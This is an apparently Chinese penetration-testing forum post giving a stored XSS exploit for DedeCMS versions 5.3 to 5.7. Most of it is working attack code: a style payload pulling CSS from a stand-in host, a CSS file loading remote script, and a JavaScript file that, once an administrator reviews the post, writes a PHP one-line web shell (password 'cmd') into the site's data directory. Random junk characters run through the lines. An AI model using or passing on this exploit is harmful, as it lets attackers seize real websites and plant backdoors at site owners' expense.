找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
返回列表 发新帖
查看: 2276|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell: n3 Y4 s$ Z( A* C/ N/ J
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰). p. ~2 ^1 w5 M
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
/ A" v6 \- f; ^0 v: T9 Z4 m1 Y! }: q下面说说利用方法。) y8 {4 Z% q0 ~7 v, V! [
条件有2个:" c8 O4 O6 |& _/ \
1.开启注册
" {' a5 g0 o1 Z5 f) s6 c% @5 W2.开启投稿
4 g# M8 p$ L+ c" A7 d' q2 F注册会员----发表文章
; j. c( g& j0 `- b: f# P- u内容填写:) x2 J7 @1 [8 g" J$ F% a! g+ S0 x
复制代码8 }- e$ |: ~8 C
<style>@im\port'\http://xxx.com/xss.css';</style>5 q1 V; H. p$ {# j' G* ?
新建XSS.Css
5 ^3 J, K9 S) p# \复制代码) I- b( V) K5 x- ?  X
.body{) Y7 Z4 e$ o4 Q. f5 p% r1 \' U
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
+ n% k0 R, a9 g4 l  d% G, j新建xss.js 内容为7 O* U  T/ X7 z6 ~' u) c. k
复制代码
/ G- q4 i' p0 `3 }3 c6 \1.var request = false;
% Z7 d$ c+ x; }7 }! Q! _1 P( y2.if(window.XMLHttpRequest) {0 E8 u4 l' F8 X" k. m% p5 D
3.request = new XMLHttpRequest();; `, F# k; p# f) ?1 w/ j6 [
4.if(request.overrideMimeType) {, \( m) Q1 p4 p0 {4 `
5.request.overrideMimeType('text/xml');
' r# b0 x) F. E, f' a+ ?1 Y5 @" @$ ~- c) p6.}& [; l6 v" |5 p9 K
7.} else if(window.ActiveXObject) {' S& b/ s8 u, j3 A: o
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];, c# k, e1 W, X5 H: k
9.for(var i=0; i<versions.length; i++) {. M- f* P1 m* m9 N& W& A
10.try {
' ^! q7 X: H+ c/ B, h# L11.request = new ActiveXObject(versions);
3 ^- h  u! D- y12.} catch(e) {}
* s4 K: ~  _) \, U7 ^13.}
* ?# s2 K. c  d: Q14.}
7 |% m4 e3 l. f2 u15.xmlhttp=request;+ M+ y! \+ }- z9 o$ g
16.function getFolder( url ){
) h; ?2 H& G; _+ x17. obj = url.split('/')* Y+ v& Z2 z3 c* n1 ~: X% R" I
18. return obj[obj.length-2]
, P! K! R7 G  o8 r' a# I19.}: v( ~1 ^1 y5 z
20.oUrl = top.location.href;
+ Z) \8 q- s* z8 j' D1 n6 D21.u = getFolder(oUrl);
$ @6 s2 F( g( F: G% a22.add_admin();
8 r/ ]( {2 T* w5 U7 @0 I23.function add_admin(){. l2 x, X" ]7 q8 f& ^$ k
24.var url= "/"+u+"/sys_sql_query.php";$ l% h" p, ]- q7 e. C
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
+ }2 W9 s8 j! ^' n& F# k: w5 X26.xmlhttp.open("POST", url, true);
# ~6 e) g8 l: X- ?) v9 {: b4 i! C27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");/ x. V+ A. q  N
28.xmlhttp.setRequestHeader("Content-length", params.length);9 Q' g; ?6 v& O+ B
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");( G; }. U7 S# U, u' ~# m- N3 |
30.xmlhttp.send(params);" o6 e7 h* }+ R; L% b9 m
31.}
2 q0 |* Y' [8 e9 f- J当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表